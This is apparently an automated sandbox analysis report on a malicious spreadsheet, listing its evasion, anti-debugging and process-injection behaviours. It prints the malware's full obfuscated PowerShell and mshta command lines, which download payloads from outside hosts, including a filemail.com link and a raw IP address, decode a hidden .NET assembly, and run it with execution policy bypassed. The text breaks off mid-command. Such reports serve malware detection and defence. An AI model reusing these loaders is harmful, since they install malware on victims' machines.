Source: 62A30000.0.dr	Stream path 'Workbook' entropy: 7.99788192848 (max. 8.0)

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AddInProcess32.exe, 00000012.00000002.643424873.00000000023D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLT-
Source: AddInProcess32.exe, 00000012.00000002.643424873.0000000002355000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2320000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 340000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5906	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1134	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5597	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2128	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 449	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1315	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5374	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1114	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll

Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3560	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784	Thread sleep count: 5597 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776	Thread sleep count: 2128 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3852	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3040	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000	Thread sleep count: 5374 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000	Thread sleep count: 1114 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 300	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 300	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 300	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2688	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: AddInProcess32.exe, 00000012.00000002.643424873.00000000023D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: AddInProcess32.exe, 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: AddInProcess32.exe, 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 18_2_002D5330 CheckRemoteDebuggerPresent,

18_2_002D5330

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process queried: DebugPort

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2964, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6826.tmp" "c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgsgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurklxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtqmvyrevgaw5jvglvbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkq2jwy2n4dvfrbsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjek1tlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifppdmrucfysdwludcagicagicagicagicagicagicagicagicagicagicagigzveuzic2dozsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbrvu96sgnmbhp5ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaizgzciiagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq2ugicagicagicagicagicagicagicagicagicagicagicbiu2jmb1zwbiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakazo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiyljezl3hhbxbwl3nll3nlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2l0agdyzwf0dghpbmdzd2l0agxvdmvya2lzcy50suyilcikrw5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtiiwwldapo1nuyvj0lxnszuvwkdmpo2lfecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtig=='+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 